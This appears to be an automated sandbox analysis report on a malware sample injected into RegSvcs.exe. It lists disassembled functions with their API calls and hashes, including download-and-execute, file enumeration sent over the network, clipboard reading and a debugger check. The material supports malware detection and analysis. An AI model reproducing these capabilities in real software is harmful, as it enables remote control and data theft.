                                    Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadExecuteFileShell
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$open
                                    • API String ID: 2825088817-1832597450
                                    • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                    • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                    • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                    • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                    Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                    • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                    Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                    • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                    Function 00451CD8 Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00451DBA
                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00451EFB
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID:
                                    • API String ID: 4212172061-0
                                    • Opcode ID: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                    • Opcode Fuzzy Hash: d51387d99b1e6b249aff8f61d3989bee7608b3a62aead1fc41d833bb042b57a0
                                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                    Function 004493AD Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 004493BD
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • GetTimeZoneInformation.KERNEL32 ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,?,00472764,000000FF,?,0000003F,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,?,004727B8,000000FF,?,0000003F,?,?,?,00472764,000000FF,?,0000003F,?,?), ref: 00449474
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    • Opcode ID: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                                    • Instruction ID: 1863d2ad967fb4723a60e4ea427cb143a9fbff6035582c54e6546b9b7662ab80
                                    • Opcode Fuzzy Hash: 633092c3bba77b0065560d4fdbd9d9f897920caf7f9bf618c5d01735725c6ecb
                                    • Instruction Fuzzy Hash: E1312570908201EFDB18DF69DE8086EBBB8FF0572071442AFE054973A1D3748D42DB18
                                    Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                    Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                    • String ID:
                                    • API String ID: 2829624132-0
                                    • Opcode ID: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                                    • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                    • Opcode Fuzzy Hash: efce462eab54bf8eb2a2b6f9a4d43eb8e53eecd25de09d2246b00390d92e3d5e
                                    • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                    Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                    • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                    • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                    Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                    • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                    • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                    Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 0040B711
                                    • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                    • CloseClipboard.USER32 ref: 0040B725
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseDataOpen
                                    • String ID:
                                    • API String ID: 2058664381-0
                                    • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                    • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                    • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                                    • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                    Function 00434C52 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-3916222277
                                    • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                    • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                    • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                    Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: GetLocaleInfoEx
                                    • API String ID: 2299586839-2904428671
                                    • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                    • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                    • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                                    • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                    Function 00412077 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                    • HeapFree.KERNEL32(00000000), ref: 004120EE
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                    • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                                    • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                                    • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                                    Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                    • String ID:
                                    • API String ID: 1663032902-0
                                    • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                    • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                    • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                    Function 00451F9B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(004520C3,00000001), ref: 0045200D
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                                    • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                    • Opcode Fuzzy Hash: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                                    • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                    Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$InfoLocale_abort_free
                                    • String ID:
                                    • API String ID: 2692324296-0
                                    • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                    • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                    • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                    • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                    Function 00452036 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00452313,00000001), ref: 00452082
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                                    • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                    • Opcode Fuzzy Hash: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                                    • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                    Function 0041B60D Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                    • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                    • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                                    • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                    Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                    • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                    • String ID:
                                    • API String ID: 1272433827-0
                                    • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                    • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                    • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                    Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • EnumSystemLocalesW.KERNEL32(00451EA7,00000001), ref: 00451F87
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                    • String ID:
                                    • API String ID: 1084509184-0
                                    • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                    • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                    • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                    Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID:
                                    • API String ID: 2299586839-0
                                    • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                    • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                    • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                    Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
